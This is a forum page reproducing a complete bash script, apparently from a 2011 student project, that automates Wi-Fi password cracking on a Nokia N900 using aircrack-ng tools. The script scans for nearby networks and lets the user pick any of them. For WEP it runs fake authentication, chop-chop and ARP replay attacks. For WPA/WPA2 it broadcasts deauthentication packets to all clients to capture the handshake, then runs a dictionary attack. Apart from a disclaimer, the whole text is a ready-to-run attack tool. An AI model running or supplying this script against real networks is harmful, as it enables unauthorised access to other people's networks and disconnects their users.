N900-crack (восстановление забытого пароля AP с помощью N900) (Страница 2 из 2)

#! /bin/bash
#   n900crack.sh
#Middlesex University
#Author: Krystian Majda M00221109
#email: niervol@gmail.com or km857@live.mdx.ac.uk
#Date: 18 April 2011
#This bash script is a deliverable of the final year project, CCM3422.
#Project superviser: Dr Jonathan Loo
#Second superviser: Dr Robert Colson

clear
echo "   n900crack.sh     -   by Krystian Majda   km857@live.mdx.ac.uk"
echo "          DISCLAIMER!!!"
echo This script is intended for educational, testing and password recovery purposes.
echo It is against the law to crack others networks.
echo I DO NOT TAKE ANY RESPONSIBILITY FOR INCORRECT OR ILLEGAL USE OF THIS SCRIPT
echo #
echo "WEP & WPA/2 cracking automation script for Nokia N900"
echo "required: aircrack-ng v1.0 and injection drivers: wl1251-meamo"
echo #

#directories and variables
crackdir="/home/user"
driverdir="/home/user/MyDocs/wl1251-maemo/binary/compat-wireless/"
scantime=20
nic="wlan0"
scanprefix="scan"
scanfile=$scanprefix"-01.csv"
networklist=networks.txt

#load injection drivers
cd $driverdir
sudo sh load.sh >>/dev/null 2>&1

#change directory to crackdir
cd $crackdir

########## scan & print loop #################
while [ "$choice" -eq "0" ]; do

#remove previous scannig data and networks list
rm -f $scan*.csv
rm -f $networklist

#scan for available networks
sudo airodump-ng -w $scanprefix --output-format csv $nic >>/dev/null 2>&1 &
echo "Scaning in progres... Please wait..."
sleep $scantime
sudo killall -q airodump-ng

echo #
echo "The following networks are available. Please note:"
echo "- Power field indicates signal level, the closer to 0 the better"
echo "- associated clent is required to crack WPA/WPA2, 'wordlist.txt' file is used for 
dictionary attack"

#print/list available networks
linenumber=1
cat $scanfile | while read line; do
if echo "$line" | grep -q  "  0."
then
#print networks with numbers and store in networklist
echo "0"$linenumber ")," $line | cut -d, -f1,2,5,7,10,15 | tee -a $networklist
linenumber=`expr $linenumber + 1`
else
#print others without numbers
echo $line | cut -d, -f1,4,6,9,14
fi
done

#read choice from user input
read -p "Enter number of the network to crack or '0' to rescan: " choice
clear
done
########### end of scan & print loop ############

#variables needed for attack
apmac=`cat $networklist | grep "$choice )," | cut -d, -f2`
apchanel=`cat $networklist | grep "$choice )," | cut -d, -f3`
apencryption=`cat $networklist | grep "$choice )," | cut -d, -f4`
apname="$(cat $networklist | grep "$choice )," | cut -d, -f6 | cut -c 2- | sed 's/ /\ /g')"
sourcemac=`sudo ifconfig | grep wlan0  | cut -d" "  -f10 | cut -d- -f1,2,3,4,5,6`

#decide on attack type
case "$apencryption" in

#unencrypted networks
*OPN*) echo "$apname" " is open/unencrypted!";;

############################################################################
# Cracking WEP

*WEP*) echo Cracking WEP encryption of $apname network, please be patient
echo when successfully cracked, password will be displayed on the screen and saved to 
echo "$apname"".txt"

#WEP relevant variables
ivs=0
minivs=30000

#removing previous files if existing
rm -f "$apname""-01.cap" "$apname""-01.csv" "$apname""-01.kismet.netxml"
rm -f "$apname""-01.kismet.csv" replay*.cap "$apname"".txt" 
rm -f arp-request.cap 
rm -f replay_dec*.xor
rm -f replay*.cap

#collecting #ivs
sudo airodump-ng -c $apchanel -w "$apname" --bssid $apmac $nic >>/dev/null 2>&1 &
sleep 2

#fake authentication
sudo aireplay-ng -1 900 -e "$apname" -a $apmac -h $sourcemac $nic >>/dev/null 2>&1 &
sleep 2

#chop chop attack to get PRGA
sudo aireplay-ng -4 -b $apmac -h $sourcemac -F $nic

#creating arp-request from PRGA
sudo packetforge-ng -0 -a $apmac -h $sourcemac -k 255.255.255.255 -l 255.255.255.255 -y replay_dec*.xor -w arp-request.cap

#injection of the arp packet
sudo aireplay-ng -2 -r arp-request.cap -h $sourcemac -F $nic >>/dev/null 2>&1 &

#waiting for minimum #ivs number
while [ $ivs -lt $minivs ]; do
sleep 30
ivs=`cat "$apname""-01.csv" | grep "$apname" | cut -d, -f11`
echo $ivs "of #ivs collected! Waiting for at least: " $minivs
done

#attempting to crack every 120s with new #ivs every time and saving password to file
while [ ! -f "$apname"".txt" ]; do
clear
sudo aircrack-ng -l "$apname"".txt" "$apname""-01.cap" &
sleep 120
sudo killall -q aircrack-ng
done

#kill no longer needed processes
sudo killall -q airodump-ng
sudo killall -q aireplay-ng

#outputing stored password if cracked
if [ -f "$apname"".txt" ]; then
echo "#########################################"
echo "  #######   Congratulations!   ########"
echo The cracked password for $apname is: `cat "$apname"".txt"`
fi
;; ##### end of WEP attack


#######################################################################
######## Cracking WPA/WPA2

*) echo Cracking WPA/WPA2 encryption of $apname network
echo when successfully cracked, password will be displayed on the screen and saved to 
echo "$apname"".txt"

#WPA relevant variables
dictionary=wordlist.txt
handshake=handshake.txt
nohandshake=1

#deleting previous files if existing
rm -f "$apname""-01.cap" "$apname""-01.csv" "$apname""-01.kismet.netxml"
rm -f "$apname""-01.kismet.csv" replay*.cap "$apname"".txt" $handshake

#catching handshake
sudo airodump-ng -c $apchanel -w "$apname" --bssid $apmac $nic >>$handshake 2>&1 &
sleep 5

#deauthenticating clients until handshake captured
while [ "$nohandshake" -eq "1" ];do
echo Waiting for legitimate client and for full, valid 4-way handshake capture. Please, wait...
#deathenticate client
sudo aireplay-ng -0 2 -a $apmac -c ffffffffffff $nic >>/dev/null 2>&1 &
sleep 15
grep -q "WPA handshake" $handshake && nohandshake=$? 
done

#kill no longer needed processes to free-up some resources
sudo killall -q airodump-ng aireplay-ng

#brute-force the captured handshake against dictionary and save password to file
#computing power hungry
sudo aircrack-ng -l "$apname"".txt" -w $dictionary -b $apmac "$apname""-01.cap"

#output cracked password again from file if existing
if [ -f "$apname"".txt" ]; then 
echo "#########################################"
echo "  #######   Congratulations!   ########"
echo The cracked password for $apname is: `cat "$apname"".txt"`
echo Regularly changed, strong WPA password is recommende!
else
echo Unfortunately, password was not found in the provided dictionary: $dictionary
fi
;; ####### end of WPA/WPA2 attack
esac

#unload the drivers
cd $driverdir
sudo sh unload.sh >>/dev/null 2>&1
sleep 2

exit
#end